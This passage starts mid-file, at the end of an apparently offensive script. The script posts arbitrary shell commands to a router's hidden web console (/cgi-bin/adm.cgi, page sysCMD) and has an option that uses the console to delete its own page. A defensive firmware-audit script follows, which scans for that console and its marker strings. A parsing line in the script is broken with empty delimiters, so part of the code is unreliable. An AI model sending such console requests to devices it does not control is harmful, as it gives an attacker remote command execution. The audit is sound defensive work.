                    sys.exit(1)

        elif (ans == "n" or ans == "N" or ans == "no" or ans == "No"):
            # Patch: use the console once to delete its own page.
            command = "rm webcmd.shtml"
            try:
                r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                r2 = requests.get("http://" + ip + "/webcmd.shtml")
                print("[ ]Trying to remove developer console")
                print("[+]System patched")
            except Exception as e:
                print(e)
                sys.exit(1)
            loop = 1  # leave the loop; otherwise the patch request repeats forever

        else:
            # Unrecognised answer: ask again instead of spinning silently.
            ans = input(prompt)


def find(html):
    # Cut the command output out of the console page. The two delimiter
    # strings passed to split() are empty on the page as published, so this
    # line raises ValueError until they are supplied.
    parsed = html.split('')[1].split('')[0]
    print(parsed)


main()
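
A defender-side check for the hidden console described in the README above, as an added example that is not part of the original README or gist: it walks a firmware root filesystem that has been unpacked (for instance with binwalk) and flags the console page and the form-field strings that exploit.py posts. That those strings appear literally inside the CGI binary is an assumption, and the sample tree is constructed for illustration.

```python
import os
import sys
import tempfile

# Indicators taken from this page: the hidden console page name and the form
# fields that exploit.py posts to /cgi-bin/adm.cgi.
CONSOLE_PAGES = {"webcmd.shtml"}
# Assumption: the handler keeps these field names as plain strings.
BINARY_MARKERS = (b"sysCMD", b"SystemCommandSubmit")
MAX_READ = 8 * 1024 * 1024  # cap bytes read per file


def audit_rootfs(root):
    """Walk an unpacked firmware root; return sorted (relative_path, reason)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                # e.g. speed.tmp -> /bin/busybox; never follow links that
                # point outside the extracted tree.
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in CONSOLE_PAGES:
                findings.append((rel, "hidden command console page"))
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_READ)
            except OSError:
                continue
            for marker in BINARY_MARKERS:
                if marker in data:
                    findings.append((rel, "contains " + marker.decode()))
    return sorted(findings)


def build_sample_rootfs(root):
    """Constructed sample tree, laid out like the web root listed on this page."""
    www = os.path.join(root, "etc_ro", "lighttpd", "www")
    os.makedirs(os.path.join(www, "cgi-bin"))
    samples = {
        "webcmd.shtml": b'<form action="/cgi-bin/adm.cgi"><input name="command"></form>',
        "login.shtml": b"<html>login</html>",
        os.path.join("cgi-bin", "adm.cgi"):
            b"\x7fELF\x00page=sysCMD\x00SystemCommandSubmit\x00",
    }
    for rel, content in samples.items():
        with open(os.path.join(www, rel), "wb") as fh:
            fh.write(content)
    # A link like the one in the listing; it must be skipped, not followed.
    os.symlink("/bin/busybox", os.path.join(www, "speed.tmp"))


def audit_sample():
    """Run the audit over the constructed sample tree."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_rootfs(tmp)
        return audit_rootfs(tmp)


if __name__ == "__main__":
    # Usage: python audit.py <extracted-rootfs>; with no argument the
    # constructed sample is audited instead.
    results = audit_rootfs(sys.argv[1]) if len(sys.argv) == 2 else audit_sample()
    for rel, reason in results:
        print(f"{rel}: {reason}")
    sys.exit(1 if results else 0)
```

A non-empty result means the image still ships the console and is a reason to replace the stock firmware rather than keep it.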
